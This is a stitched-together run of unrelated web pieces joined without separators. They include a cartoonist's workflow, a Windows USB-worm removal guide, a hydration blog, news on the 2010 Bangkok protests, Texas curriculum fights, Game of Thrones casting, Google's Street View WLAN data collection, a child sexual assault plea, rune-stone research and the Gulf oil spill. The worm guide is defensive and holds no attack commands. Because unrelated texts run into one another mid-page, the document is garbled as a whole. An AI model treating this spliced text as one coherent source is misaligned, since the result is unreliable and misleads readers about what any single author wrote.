I keep notes in a book which get turned into stories and dialogue on cards , which then get sorted and organised ( over and over sometimes ) .
Then I sit down and usually pencil a week ’s worth of comics using a Dixon pencil on bristol board ( thick paper ) .
After , I ink each one with a Pentel brush pen , then erase the pencil lines before scanning the strips into Photoshop , where I colour and letter them .
Finally , I publish to the web ( which is done semi-automatically now ) .
I do most of the writing in the evenings during the week , and the art gets done over the weekend .
Advertisement
For more information , visit www.yehudamoon.com.
Plug a pendrive into a public computer and you will be pesked by the continuously replicating “ New Folder.exe ” virus or the “ regsvr.exe ” virus .
Hear my story , while I transferred my notes last night ( around 600 folders ) and I was surprised to see that around 450 MB of space was eaten by these self replicating space eaters !
I was running Linux so these were not a concern for me , but when I plugged my pendrive into my virtual machine ( windows xp sp3 ) , it caused multiple problems of explorer corruption and disabling registry tools .
Time for some virus busting I guess .. here is how you can remove “ regsvr.exe ” and “ new folder.exe ” from your computer .
Step 1 - Some Startup Repairs
First of all , boot into safe mode .
After you get to your desktop , press F3 or Ctrl +
F and search for “ autorun.inf ” file in your computer and delete all the subsequent files .
I case you are no able to delete them , select all the files and uncheck the ” Read Only ” option .
If you are still not able to delete them , you might want to try out Unlocker tool to delete the files .
Now go to
start – > run –> type ” msconfig ” and press enter
Go to startup tab and uncheck “ regsvr ” , click ok and then click on “ Exit without restart ” .
Now go to
control panel –> scheduled tasks and delete “ At1 ” task listed there .
Once done , close all windows .
Step 2 - Changing Configurations
Your registry might be disabled , and you need to activate it back to undo all the malicious changes done by worm .
In order to do that , you need to go to
start – > run –> type ” gpedit.msc ” and press enter
then navigate to
users configuration –> Administrative templates –> systems
Find “ prevent access to registry editing tools ” , double click it and change the option to disable .
Once done , your Regedit will be enabled .
In case your task manager is disabled , you need to enable it .
Step 3 - Registry Edits
Now we have to perform some registry edits to enable our explorer and to remove all instances of worm from the registry .
Go to
start – > run –> type ” regedit ” and press enter
Click on Edit –>
Find and search for regsvr.exe .
Find and delete all the occurrences of regsvr.exe virus ( do n't delete regsvr32.exe as its not a virus ) .
then navigate to entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion \Winlogon
and modify the entry
Shell = “ Explorer.exe regsvr.exe ”
to delete the regsvr.exe from it , so that it becomes
Shell = “ Explorer.exe ”
Once done , close all windows and get ready to delete all virus files .
Step 4 - Deleting Virus Files
The final step is to delete all the virus files in your computer .
To do this , Press F3 or Ctrl +
F and search for regsvr.exe ( make sure to search in hidden folders ) and delete all “ regsvr.exe ” “ svchost .exe ” files ( notice the gap between ‘ svchost ’ and ‘.exe ’ , keep in mind you do n't delete the legitimate file . ) .
Clean your recycle bin and restart your PC ( perform a cold boot ) .
Volia .. you have cleaned your computer from regsvr .. just make sure to scan your pendrive the next time you plug in :)
Like
This post ?
You can buy me a Beer :)
The body is mainly water , and I believe maintaining hydration is an important component of optimal health .
I wrote most recently about this back in February ( see here ) .
This blog piece details some of the major roles that water has in the body ( e.g. as a temperature regulator , carrier and building material ) .
In practice , I have noticed that dehydration has the capacity to provoke many adverse symptoms , perhaps the most common of which is lethargy – particularly mental lethargy .
It ’s based on clinical observation , but I generally believe that maintaining hydration is important for fluid thinking .
I was therefore interested to read a recent study in which the affects of dehydration on brain function was tested [ 1 ] .
The study essentially induced dehydration in individuals by having them exercise in a warm environment .
Their brain function was assessed using what is known as functional magnetic resonance imaging .
Part of this test involved subjecting individuals to an assessment known as the blood - oxygen - level - dependent ( BOLD ) response , which essentially measures the increase in resources ( oxygen and nutrients ) diverted to a part of the brain once activated .
The subjects , after being made dehydrated , were assessed with a problem solving test .
Compared to a better hydrated state , those who were dehydrated has a great BOLD response .
What this essentially suggests is that a dehydrated brain requires more resources ( has to work harder ) to get the same result .
The authors of this study concluded that “ Given the limited availability of brain metabolic resources , these findings suggest that prolonged states of reduced water intake may adversely impact executive functions such as planning and visuo - spatial processing . ”
Here , it seems we have at least some subjective evidence which suggests that hydration is important for optimal brain function .
I advise individuals to drink enough water to keep their urine pale yellow in colour right throughout the day .
Should urine stray into darker tones , I suggest upping water intake .
I have found in practice , that just this one simple measure usually increases energy levels ( including mental energy ) within half an hour or so .
This study was actually performed in adolescents .
As I was reminded yesterday by a friend , exam time is looming for many adolescents .
One simple thing that may help their revision and exam performance is for them to simply add water .
References :
1. Kempton KJ , et al .
Dehydration affects brain structure and function in healthy adolescents .
Human Brain Mapping 24 March 2010 [ epub ahead of print ]
On behalf of everyone involved with The Pink Pedal we would like to say thank you for the tremendous support .
Every person that donated to the cause , bought a t - shirt , gave us somewhere to stay , and even left a comment on our website helped push The Pink Pedal to what it is today .
We also ca n’t say enough to thank everyone who donated to help out the Anczarski family in their time of need .
The Pink Pedal has come a long way from an idea just thrown around in early January .
In a little over four months we successfully created and executed a cross county cycling trip to do what we could to help the fight for breast cancer .
The Pink Pedal was a lot more work than I think any of us imagined when we decided to go ahead with the idea .
Behind the scenes we were working day in and day out to get this up and running .
Knowing how many people we could potentially help really inspired us to push the project ahead .
We never would have thought that biking would actually be one of the easier parts of the trip ( and by no means was it easy ) .
The hundreds of phone calls and emails showed us just how much work goes into a fundraiser of this magnitude .
We remember talking amongst ourselves that the IRS makes it really hard to do something good .
Learning all of the subtitles of tax exemption took weeks until we actually figured out to legally make The Pink Pedal .
Figuring out a breast cancer organization was also difficult as we needed to find one that could help us take secure online donations .
After calling what seemed like every cancer and breast cancer organization in the United States , Susan G. Komen for the Cure quickly became the obvious choice for our venture .
They had a great online infrastructure already set in place and we knew they could put the money we raised where it needed to go to make a difference .
After contacting countless companies in every industry imaginable and many frustrating days , we ended up with some great sponsors that helped make this trip a reality .
For every one company that agreed to help us , it was like 10 would say no right off the bat and 20 would never even call us back .
Gaining corporate support was much more difficult than any of us initially thought .
We were all in different parts of the country so organization could sometimes prove difficult , but in the end it all worked out for a departure in late May .
The Pink Pedal truly was the trip of a lifetime .
We all wanted to make a difference in the world and I think we have made a larger impact than we could have ever imagined .
Rest In Peace John .
Your sacrifices and the mark you left on the world will never be forgotten .
- Ty Bereskie
Okay , I know it ’s to shut off the fuel pump , but when should it be used ?
I just rented a car from Hertz and they upgraded me to a Lincoln Town Car .
Inside the trunk there was button to shut off the fuel pump .
I tried to figure out the reason for it to be there .
First I figure it ’s for a fire in the engine compartment .
You ’d want to turn the fuel pump off then for sure .
The only trouble is , how do you get to it ?
If you turn off the ignition , the fuel pump stops by itself , and if you do n’t turn off the ignition , the keys sit dangling from the steering column and you ca n’t get in the trunk .
I suppose if you were carjacked and stuffed in your own trunk you could shut down the engine , but once you ’re in the trunk , you ’re pretty much done for anyway , and it ’s a little late for measures that will only piss off the carjacker .
It might be part of a security system .
If you were to open the trunk and shut off the fuel pump a thief might not know how to get the fuel pump started again .
Hell , I did n’t know either , the notice on the switch said to consult the owners manual for restarting instructions .
So , are these fuel pump shut off switches common ?
I ’ve only seen two , both in the last two weeks , one in a Grand Marquis and one in the Town Car .
Has anyone ever used one of these things and when ?
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
Thai officials have ruled out UN - backed mediation in an increasingly violent dispute with anti-government protesters on the streets of Bangkok .
A protest leader suggested the talks , but a government spokesman was quick to rebuff the offer , saying outside groups should not interfere .
At least 31 people have died since Thursday , when soldiers and police moved in to shift the demonstrators .
The protesters , known as red-shirts , have been camped in Bangkok for months .
They want Prime Minister Abhisit Vejjajiva to resign and call a new election .
A red -shirt leader , Nattawut Saikua , said protesters were willing to hold UN - moderated talks to end the stand - off , providing that the army withdrew from the area around the red - shirt camp .
But government spokesman Panitan Wattanayagorn insisted that no outside help was needed .
" We reject their demands for UN mediation ...
No Thai government has ever let anyone intervene with our internal affairs , " he said .
Plea to Red Cross
A state of emergency has been declared in more than 20 provinces across the country - mostly in the protesters ' northern heartlands - in a bid to stop more demonstrators heading to the capital .
RED - SHIRT PROTEST 14 Mar : Red-shirts converge on Bangkok , occupy government district 16 Mar : Protesters splash their own blood at Government House 30 Mar : Talks with government ends in deadlock 3 Apr : Occupy Bangkok shopping district 10 Apr : Troops try to clear protesters ; 25 people are killed and hundreds injured 13 - 14 May : 16 killed in Bangkok clashes 15 May : Eight killed in street battles
In pictures : Bangkok violence Thai protests : Eyewitness accounts Profile : Thailand 's reds and yellows Officials have urged women and older people to leave the protest zone by Monday afternoon , and have asked for help from the Red Cross .
About 5,000 people remain in the encampment , where food and water are running low amid a blockade on the area .
Sporadic clashes were reported on Sunday , but not on the same scale as previous days .
The BBC's Rachel Harvey says streets around the protest area are littered with fires ; thick black smoke is rising into the air .
She says the pattern of demonstrations is that the protesters set up a disturbance and fires in one area , and the troops try to gain control of that area - then the demonstrators move somewhere else .
The latest fighting flared on Thursday , as the army and police moved to isolate a fortified protest camp .
Thousands of demonstrators remain behind makeshift barricades of rubber tyres , sandbags and bamboo stakes in the Ratchaprasong commercial district .
Mr Abhisit has declared Monday and Tuesday as public holidays and delayed the start of Bangkok 's school term , but a planned curfew was cancelled .
Army ' prepared '
On Saturday , Mr Abhisit said the army would not back down in its operation to clear the protesters .
" We cannot leave the country in a situation where people who do n't obey the law are holding hostage the people of Bangkok , as well as the centre of the country , " he said .
Several hundred protesters are gathering in other parts of Bangkok
Mr Abhisit and security officials have insisted that their operations against the protesters have targeted armed " terrorists " who they say have infiltrated the protesters .
Earlier , the army declared " live - fire zones " in some areas as it attempted to cut off the camp from supplies and reinforcements .
US - based Human Rights
Watch warned that the zones had set the Thai authorities on a " slippery slope " towards serious human rights abuses .
More than 200 people have been injured since Thursday , and 27 people have been sent to jail , each given six - month sentences .
All the fatalities have been civilians .
Please turn on JavaScript .
Media requires JavaScript to play .
The clashes have raised questions about the stability of Thailand , South East Asia 's second - largest economy .
Many of the protesters are from poor rural areas in northern Thailand where support is still strong for former Prime Minister Thaksin Shinawatra , who was ousted in a 2006 coup .
Mr Thaksin has called on the government to withdraw troops and restart negotiations .
He is living abroad to avoid a jail term on a corruption conviction .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
In their January meeting , State Board of Education members came armed with more amendments to the state social studies curriculum than they could vote on — a process hardly helped by the acrimony between the board ’s socially conservative bloc and more moderate Republicans and liberal Democrats .
And so the SBOE kicked the process of revising the standards down the road to this week ’s meeting , where social studies rewrites will resume today .
Because of the flood of amendments under consideration , we ’ve produced this annotated version of the high school U.S. History standards , which have been the focus of controversy .
You can see exactly what the board has added , deleted and rewritten , along with our analysis of the current arguments and historical context behind each change .
Expect more at today ’s meeting of what we saw two months ago :
Many edits from the conservative bloc , with attendant gnashing of teeth from both their opponents and supporters .
If previous meetings are any guide , scores of impassioned speakers from diverse statewide constituencies will address the board on what has become the state ’s highest - profile battleground in the never - ending culture wars .
At issue : the inclusion of minorities , particularly Hispanics ; the balance between liberal and conservative ; the clash between “ pro-America ” proponents vs. those who accuse them of a historical “ whitewash ” ; the concept of American Exceptionalism ; the proper role of religion ; and , yes , even country music versus hip - hop .
Speaking of religion , the conservative board members have yet to pass any substantial amendments injecting their Christian fundamentalism into the history standards — despite rampant fears from critics and intense national press attention on that prospect .
But what the members will do from here is anybody ’s guess .
Since the last meeting , board member and former chair Don McLeroy — the most aggressive amender of curriculum and a self - proclaimed “ religious fanatic ” who believes education is “ too important not to politicize ” — narrowly lost the Republican primary to lobbyist Thomas Ratliff , a moderate who campaigned on a platform of depoliticizing the board .
But do n’t expect McLeroy , who will serve the remainder of this year , to limp out like a lame duck .
Asked whether the election results would affect his plans for the social studies curriculum , he said , “ Gosh no .
I had some tremendous opposition , and a lot of people working against me , and I still almost won .
The fact that I would change would be silly .
“ The people who write about there being a tilt to the right in the curriculum never write about the tilt to the left , because they just do n’t see it , ” McLeroy said .
“ The reason why there ’s so many more amendments to the social studies curriculum than to other subjects is because the balance was lacking .
The populists , the progressives , the Great Society , all that stuff is from the left . …
This country was founded on conservative , limited - government principles . ”
Emilia Clarke will replace Tamzin Merchant in the role of Daenerys Targaryen on HBO ’s “ Game of Thrones , ” according to The Chicago Tribune .
A recent graduate of Drama Centre London , Clarke has acted on stage since 2008 and has played a role on the BBC series “ Doctors . ”
Merchant had starred as Daenerys — an exiled princess from an ancient dynasty linked to dragons — in the pilot for “ Game of Thrones , ” which was completed in November .
However , HBO announced in April that it would seek another actress for the role .
Portions of the pilot will be reshot to include Clarke .
“ Game of Thrones ” marks HBO ’s first venture into epic fantasy ; it ’s expected to have a strong adult tone , reminiscent of the network ’s acclaimed series “ Deadwood ” and “ Rome . ” Based on author George R.R. Martins bestselling A Song of Ice and Fire novels , the series will chronicle a treacherous clash between royal families to secure ultimate power of the vast lands of Westeros .
Production on a 10 - episode season is scheduled to start in Northern Ireland in July .
The series will debut next spring , and if renewed , Season 2 would cover the events of Martin ’s second novel , “ A Clash of Kings . ”
“ I have n’t had the chance to meet Emilia yet , but I ’ve seen her auditions , ” Martin said in a LiveJournal post Friday .
“ She gave some kickass readings , winning out over some amazing competition from all around the world .
She should make a great Dany . ”
Casting continues for Season 1 ’s supporting characters .
Already aboard the series are Sean Bean ( “ The Lord of the Rings ” ) , as Eddard “ Ned ” Stark ; Lena Headey ( “ Terminator : The Sarah Connor Chronicles , ” “ 300 ” ) , as queen Cersei Lannister ; Peter Dinklage ( “ Threshold ” ) as her cunning dwarf brother Tyrion ; Nikolaj Coster - Waldau ( “ New Amsterdam ” ) as her twin , Jaime ; and Mark Addy as King Robert Baratheon .
Merchant ’s departure is n’t the first “ Game of Thrones ” casting change ordered after the pilot .
Actress Michelle Fairley will replace Jennifer
Ehle in the role of Eddard ’s wife , Catelyn .
Der US - amerikanische Internetdienstleister Google will nicht mehr mit Hilfe seiner Street - View - Autos WLAN - Daten sammeln .
Damit zieht das Unternehmen eine Konsequenz aus einer nun von ihm selbst eingeräumten internen Panne .
Ende April hatte Google noch in einer Mitteilung beteuert , die mit Kamera und WLAN - Empfänger ausgerüsteten Autos sammelten lediglich die MAC - Adressen und die Namen ( SSID ) der Funknetze .
Nun hat das Unternehmen die Angaben korrigiert .
Entgegen der vorigen expliziten Behauptung hatten die Autos doch von den WLAN ausgegebene Nutzdaten ( " payload data " ) gespeichert , teilte Google in seinem Weblog mit .
Google hatte mit der Mitteilung im April auf Kritik von deutschen Datenschützern reagiert .
Der Hamburgische Datenschutzbeauftragte Johannes Caspar und der Datenschutzbeauftragte des Bundes , Peter Schaar , hatten gefordert , dass Google die WLAN - Scanner aus Street - View - Fahrzeugen sofort ausbaut , da private Funknetze rechtswidrig gescannt würden .
Google hatte daraufhin erklärt , das Unternehmen sammle so wie auch andere die Daten zum Zweck der Positionsbestimmung für Geräte ohne GPS .
Solche Daten habe Google bis dahin eingekauft .
Vor zehn Tagen habe Caspar um eine Überprüfung der von den Street - View - Autos gesammelten Daten gebeten , schilderte Google - Manager Alan Eustace im Google - Blog .
Das habe Google dazu veranlasst , intern die Datensammlung zu sichten .
Dabei habe sich herausgestellt , dass die Stellungnahme vom 27 .
April zum Umfang der Datensammlung falsch gewesen sei .
Bei den Autofahrten seien versehentlich auch Nutzdaten von offenen Funknetzen aufgezeichnet worden .
Eustace betonte , Google habe diese Daten für keines seiner Produkte verwendet .
Als Ursache für die versehentliche Aufzeichnung gibt Eustace an , dass im Jahr 2006 ein Entwickler , der an einem experimentellen WLAN - Projekt beteiligt war , eine Software geschrieben hatte , die alle Arten öffentlich erhältlicher WLAN - Daten aufzeichnet .
Als im Jahr 2007 die Street - View - Autos erstmals losfuhren , sei dieses Stück Software unbeabsichtigt mit an Bord gewesen .
Da aber die Autos ständig in Bewegung seien und die WLAN - Empfänger fünfmal pro Sekunde den Kanal wechselten , seien nur Bruchstücke der jeweiligen Nutzdaten aufgezeichnet worden , und zwar nur dann , wenn das WLAN just in dem Moment genutzt worden sei .
Daten von geschützten Funknetzen seien nicht gesammelt worden .
Sobald Google auf die Daten gestoßen sei , seien sie isoliert und aus dem Unternehmensnetz genommen worden , damit sie nicht mehr zugänglich sind , teilte Eustace weiter mit .
Derzeit nehme Google Kontakt mit den zuständigen Behörden in den betroffenen Ländern auf , um die Löschung der Daten zu regeln .
Für Google sei das Vertrauen der Menschen wichtig , schrieb Google - Manager Eustace , doch hier habe das Unternehmen gefehlt .
Nun sollen unabhängige Experten hinzugezogen werden , die die Software zur Aufzeichnung der WLAN - Daten überprüfen sollen .
Außerdem sollen die unternehmensinternen Handlungsabläufe inspiziert werden , um sicherzustellen , dass die Kontrollen ausreichen , um derartige Vorfälle künftig ausschließen zu können .
( anw )
“ Bad things happen when an empire allows its infrastructure to decline . ”
That ’s the gist of the History Channel ’s terrifying documentary , The Crumbling of America , which ran this morning just to offer some cheery fodder for a holiday weekend .
The documenary is from 2009 , but it amidst the staggering damage of the BP oil spill it could not be more timely as the nation gapes at the massive catastrophe still unfolding in the Gulf and looks back on how it might have been prevented .
The backward - look happens after every catastrphe — the blame game and the finger - pointing of who should have known and why was n’t this looked after — but The Crumbling of America is ahead of that process for the nation ’s bridges , roads , dams , tunnels , sewage systems and everything else that holds the country together , and it ’s pretty damn scary .
The scariest part : Knowing that it will be largely ignored until the next catastrophe happens .
“ Design flaws , not enough money , normal corrosion , and decades of deferred maintenance have conspired to bring America ’s infrastructure down , ” intones the voiceover who could well be doubling for the trailer for 2012 .
Take the dams .
“ There are 85 , 000 dams in the U.S. , ” says the narrator , as the camera pans over a sparkling - blue sampling .
“ Four thousand of them are unsafe .
And 1800 of those are high hazard dams – dams that are likely to kill people if they fail . ”
We are informed that the number of unsafe high - hazard dams has quadrupled since 2001 .
Here ’s some more to freak you out :
Inspections are critical …and yet , states have cut inspection programs to the bone .
In 2007 , the last year for which statistics are available , Texas had just 7 inspectors responsible for 7,400 dams .
That ’s over 1,050 dams per inspector .
The state was only able to look at 239 dams .
That same year , Iowa had one full - time and one part - time inspector .
Overseeing 3,344 dams .
They were only able to inspect 128 dams .
Alabama does n’t even have an inspection agency to monitor its 2,000 - plus dams .
Adding to the danger are thousands of ‘ orphan dams ’ – those abandoned by corporations and private owners with no one left in charge .
Never mind the revolting dangers posed by a crumbling sewage system .
I would not advise anyone to move to St. Louis any time soon .
I ’m not a horror flick person , so I never saw Wolf Creek .
But this , about the Wolf Creek Dam in Kentucky , sounds pretty damn scary :
Five major dams in the eastern U.S. were also built on porous limestone in the 1930s .
At the time , dam designers did n’t understand the ramifications of porous foundations .
But Wolf Creek may well be the most hazardous .
If it failed , 6 million acre-feet of water in Lake Cumberland would pour into the Cumberland River , rushing downstream at 40 feet per second , and flooding towns and cities for hundreds of miles .
6 million acre feet is enough to cover the entire state of New Jersey with a foot of water .
Scores would be killed , and damage would run into the billions .
Ironically ,
The Crumbling of America goes on to map out how the overflow would be carried to the next urban center downstream : Nashville .
It shows the doomsday Nashville flood scenario : “ The heart of Music City , USA is 20 feet underwater . ”
It ’s is shocking to see and meant to freak the watcher out – except since this documentary was made , Nashville under water has happened .
To middling media interest , thanks to other distractions .
That does not bode well for media interest in covering these other infrastructure issues — especially before they happen .
Yawn .
The Crumbling of America goes into similarly scary detail on sewage ( “ Nationwide , the United States has more than one million miles of sewage pipes … and much of that vast system consists of heavily leaking pipes like these ” ) , bridges ( “ In the next 10 years , , , over 50 % of our bridges will be over 50 years old ” ) , roads ( “ America ’s roads and highways are heading for a crash … 33 Percent of our major highways are in poor or mediocre condition .
The road system that we ’ve come to depend on , the road system that we built our wealth on and our power on is falling apart .
It ’s literally falling apart ” ) and levees ( “ America ’s levees are also falling apart and the crisis extends far beyond New Orleans ” ) .
Apparently they ’re talking to you , California .
Best of luck .
Remember the Minneapolis bridge collapse ?
Does the media ?
Does the administration ?
Do the administrations of each of the states ?
There are so many things that can go wrong — and this BP episode is such a scary test case of how badly things can screw up .
The Crumbling of America should be required viewing for local and national government , not to mention the local and national media who should be keeping their feet to the fire on guarding against disaster .
If you do n’t believe me , give it a watch .
Make no mistake about it : The Crumbling of America will scare the sewage out of you .
Have a tip we should know ?
[ email protected ]
The two South Florida high school teachers accused of sprinkling holy water on a fellow teacher for not believing in God are getting support from religious leaders and even the local Tea Party .
Leslie Rainer and Djuna Robinson , both 20 - year veterans at their alma mater Blanche Ely in Pompano Beach , have been reassigned as the school district investigates the incident as a religious bullying .
There 's a dispute over what exactly happened , but whatever went down , it did so in front of a class full of students .
The two disciplined teachers deny it even though the Broward School District apparently believes it did , in fact , happen .
" Do you miss the kids ? " teacher Rainer was asked Monday .
" I miss them a lot .
Yes , I do , " she said .
" Do you want to get back to that classroom ? "
" As soon as I can ... I miss my students . "
Rainer and Robinson deny sprinkling holy water on fellow teacher Schandra Rodriguez , when she talked about her atheism in class back in March .
Religious leaders turned the tables and lashed out at the very notion that a teacher who is atheist would be talking to students about it .
The two disciplined teachers “ stood up to this type of teaching , " said Pastor Alonzo Neal , Greater Antioch Mission Baptist Church of Pompano Beach .
“ I think it ’s very , very wrong to expose the students , impressionable minds to things that could lead them into a negative mindset against what we believe and who we believe in which is the truth : A Living God . ”
There are two versions of what happened on March 11 .
Rodriguez , in her complaint , according to the South Florida Times , says Robinson and Rainer sprinkled her with holy water .
The two teachers say it was only a bottle of spray perfume and that they were nowhere near Rodriguez .
One of the students , Robinson and Rainer say , stood up and jokingly said “ it sounds like someone needs some holy water . ”
School district authorities suspended the two , saying in a hand - delivered letter it's " alleged that you upbraided and embarrassed a teacher ... in front of a classroom of students . "
It continued , " You are not to return to Branche Ely High School unless so directed by me . "
" And for something like this to happen , ” said their attorney Johnny McCray , “ for them to be removed , the manner in which they were removed from the campus , is embarrassing , is denigrating and , you know , it leaves a very bad taste in the mouth . "
Aside from the religious leaders voicing support was Danita Kilcullen , the founder and organizer of the Tea Party in Fort Lauderdale .
She vows to get the Tea Party behind the suspended teachers .
" Because it 's a breach of the First Amendment and because we so strongly believe in the Constitution in the United States of America , " Kilcullen said .
And what about the atheist teacher 's first amendments rights ?
" Yea , but she has n't been punished for speaking out yet , " Kilcullen said .
The two disciplined teachers have been suspended from their regular jobs , transferred to different jobs while a full investigation is underway .
Rodriguez could not be reached for comment .
An Australian camp counsellor labelled a " child predator " by United States authorities has surprised Texas prosecutors by agreeing to serve 40 years in prison for sexually assaulting five young boys at a summer camp .
When Scott Zirus , 26 , from Pinjarra in Western Australia , was led into court in Kerrville , Texas , on Friday he was expected to plead not guilty to the assaults , but in an about face that also surprised his lawyer , Zirus admitted his guilt and accepted a plea deal .
Just days ago Zirus rejected the 40 - year plea deal .
Prosecutors had vowed to seek the maximum sentence under Texas law of life in jail if Zirus took the case to trial and forced his young victims , aged five and six - years - old , to testify in court .
" If we were going to go to trial Zirus would never see the free world again , " Todd Burdick , an investigator in the Kerr County District Attorney 's Office said .
Zirus ' American lawyer James Patterson said the threat of a life sentence in the Texas prison system weighed heavily on Zirus .
" He had completely rejected the deal and I guess he just got to thinking about it and what the downside was and he decided to take it , " Mr Patterson said .
Zirus is eligible for parole in 20 years .
Mr Burdick and other members of the prosecuting team believe a life sentence slapped on one of Zirus ' cell mates persuaded Zirus to take the deal .
Zirus shares a cell in the Kerry County Jail with Alfredo Ramirez , a 27 - year - old from Kerrville , who fought allegations of sexually assaulting 13 and 14 - year - old girls , but lost the case and on Thursday was sentenced to 119 years ' jail .
" I think that changed Mr Zirus ' mind , " Mr Burdick said of the Ramirez verdict .
" Zirus is in the same cell with him .
" All of the sex offenders have the same cell together . "
Zirus was working at a boys camp in Hunt , Texas , as a counsellor last year under an international exchange program when the first young victims came forward with the allegations .
Prosecutors originally charged Zirus with assaulting three boys , but five victims eventually came forward .
Zirus also ran a children 's camp in West Australia and was involved in the Scout movement .
After Zirus ' computer was examined by US authorities Kerr County Sheriff Rusty Hierholzer labelled Zirus a child predator and said Zirus may have Australian victims .
West Australian authorities began an investigation and interviewed 370 children who attended Australian camps involving Zirus .
Four alleged victims came forward .
Mr Patterson said Zirus will apply to serve his Texas jail sentence in Australia , but the Kerr County DA 's office says he will not be successful .
Mr Burdick said West Australian authorities will also have to wait until Zirus completes his sentence in Texas before he can be brought before the courts in Australia .
" They 'll get a crack at him after he goes through the Texas penitentiary , " Mr Burdick said .
The Texas victims and their families were relieved Zirus entered the guilty pleas and would never be allowed to be a free man in the US again .
When Zirus serves his time he will be immediately deported to Australia and banned from entering the US .
Zirus pled guilty in court on Friday to charges of aggravated sexual assault of a child , sexual contact with a child and continuous sexual abuse of a child under 14 .
In Australia Zirus is accused of eight counts of indecent dealing with a child under 13 , one count of procuring and inciting a child to do an indecent act and one count of indecently recording a child .
- AAP
It was not necessary to be literate to be able to access rune carvings in the 11th century .
At the same time those who could read were able to glean much more information from a rune stone than merely what was written in runes .
This is shown in new research from Uppsala University in Sweden .
Rune stones are an important part of the Swedish cultural environment .
Many of them are still standing in their original places and still bear witness about the inhabitants of the area from a thousand years ago .
They thereby represent a unique source of knowledge about the Viking Age , providing us with glimpses of a period we otherwise would have known very little about .
Among other themes , they tell us about family relations , travels , or matters of faith , and all of it in a language that scholars can understand fairly readily .
" The language and factual information of runic inscriptions are fairly well researched , but we know little about how Viking Age people read a rune stone , " says Marco Bianchi at the Department of Scandinavian Languages , whose dissertation investigates Viking Age written culture in the provinces of Uppland and Södermanland .
There are a number of inscriptions with runes that do not convey any linguistic meaning .
In Uppland they are found both in areas that are rich in rune stones and in those that have very few .
" But the fewer rune stones there were in the vicinity , the poorer writers the carvers of these non-verbal inscriptions were .
What was important was thus not to convey a linguistic message , but to create a rune carving that was perceived by the local people as credible , " claims Marco Bianchi .
However , rune stones entirely lacking in linguistic content are rather rare .
On most rune stones you can read a little narrative in the form of a memorial inscription that often winds back and forth across a large stone surface .
At first glance these runic inscriptions seem chaotic , but they are in fact very well structured .
Usually they are meant to be read starting in the lower left - hand corner .
Another observation Marco Bianchi makes is that many rune stones do not have any given reading order .
Different parts of the inscription are in such cases visually separated from each other and can be read in any order the reader wishes .
" You can compare a rune stone text with a newspaper spread or a Web page , where the reader is attracted by headings and pictures , " says Marco Bianchi .
The visual design not only structures the linguistic message but complements and nuances it as well .
" On many rune stones the interplay between ornamentation and the runes is striking .
To people of the Viking Age , the actual runes were only part of the message of the rune stone , " he says .
As oil spill grows , sea turtle strandings increase sharply
There have been 162 sea turtles strandings this month along the coast from Florida to Louisiana , national wildlife officials said Tuesday , a number much higher than any May total in the last five years .
Officials said that 156 of the turtles died .
While noting the higher rate of strandings , the same officials stopped short of blaming the ongoing oil spill , adding that there were no visible signs of oil on the turtle carcasses …
Is this just the beginning ?
Most of the dead sea turtles recovered since April are juvenile Kemps Ridleys , which have been on the endangered species list since 1970 .
Beach surveys are ongoing to locate turtle nests .
Rowan Gould , acting director of the U.S. Fish and Wildlife service , said multiple state agencies are documenting impacts and working to understand the long - term effects of the spill .
“ We ’ve recovered a relatively small number of visibly oiled birds in this spill , ” Gould said .
“ The visibly oiled birds are only a small part of the concern .
What concerns us most is what we ca n’t see — the probable effects of the spill on the coastal environment . ”
Of immediate concern , Gould said , are dozens of local bird species that breed along the Gulf Coast : “ We expect they ’ll bear the brunt of the immediate impact of the oil .
I do n’t know if we will ever know the full impact of oil on the birds . ”
So …
Then what happens if they CAN ’T cap or stop this gushing leak ..?
( Gould : ) “ We are preparing for the likelihood that ( the spill ) will persist in the gulf ecosystem for years to come , ” he said .
“ This spill is unprecedented .
We may never know the spill ’s full impact on birds and marine mammals . ”
And in the meantime , the head of BP , Tony Hayward , is out there saying this :
“ I think the environmental impact of this disaster is likely to have been very , very modest , ” Tony Hayward said .
“ It is impossible to say and we will mount , as part of the aftermath , a very detailed environmental assessment but everything we can see at the moment suggests that the overall environmental impact will be very , very modest . ”
And this :
“ The Gulf of Mexico is a very big ocean .
The amount of volume of oil and dispersant we are putting into it is tiny in relation to the total water volume . ”
Oh … I feel so much better now ..
Though , I do n’t quite sense any remorse in these statements .
No comprehension either .
Either Mr. Hayward does n’t get it , or he flat out does n’t care ( or both ) .
Consider then the coastal ‘ Dead Zones ’ that have been a serious concern globally , studied for over twenty years now .
The ‘ Dead Zone ’ in the Gulf of Mexico is now compounded further by the leaking [ gushing ] of gas as well as the oil .
We are facing an ecological catastrophe on a scale I can’t quite wrap my head around .
This next graphic was posted here in 2008 :
The problem with the ‘ Dead Zone ’ in the Gulf of Mexico was already a very serious problem .
So , now ..?
Rachel Maddow discussed these ‘ Dead Zones ’ on her show two nights ago :
For more reading on the coastal ‘ Dead Zones ’ , and the impact of this spill :
UPDATE : Gas Leak 3000 Times Worse Than Oil – Updated Math
This repost of a diary from 2 days ago describes the fact that there is 3000 times more natural gas coming out of the leak than oil .
All of the gas is currently staying in the water because the ocean has the capacity to hold large quantities of methane in solution .
When methane breaks down it depletes oxygen in the water .
Then , when it continues to break down it produces hydrogen sulfate
After some discussions with people who are currently working to determine the extent of this undersea damage , I decided we need to revisit this topic :
The damage of the massive amounts of Gas being released into the gulf is worse than the oil …
Gulf oil spill : An ‘ ecological disaster ’?
.. Louisiana ’s dead zone , the world ’s second largest ( after the Baltic Sea ) , arrives every year after fertilizer washing down the Mississippi River feds enormous blooms of algae that die , sink to the bottom and begin to decay .
The decomposition sucks oxygen out of the seawater , leaving little or none for fish and other marine life .
Monitoring stations run by the marine consortium have already detected some low - oxygen zones , said Rabalais , from her office on Terrebonne Bay , adding that the year ’s zone could be exacerbated by surface oil blocking lifegiving oxygen from enriching the water .
“ The oil sheen , the layering on the surface of the water , could prevent the diffusion of oxygen into the water , ” she said .
“ It could aggravate the low - oxygen zone that we ’re already seeing develop in the gulf . ” ..
Gulf Wildlife ‘ Dead Zone ’ Keeps Growing
An over 7,000 - square - mile wildlife “ dead zone ” located in the center of the Gulf of Mexico has grown from being a curiosity to a colossus over the past two decades , according to the National Wildlife Federation ( NWF ) , and scientists are now concerned the recent oil spill and other emerging chemical threats could widen the zone even further .
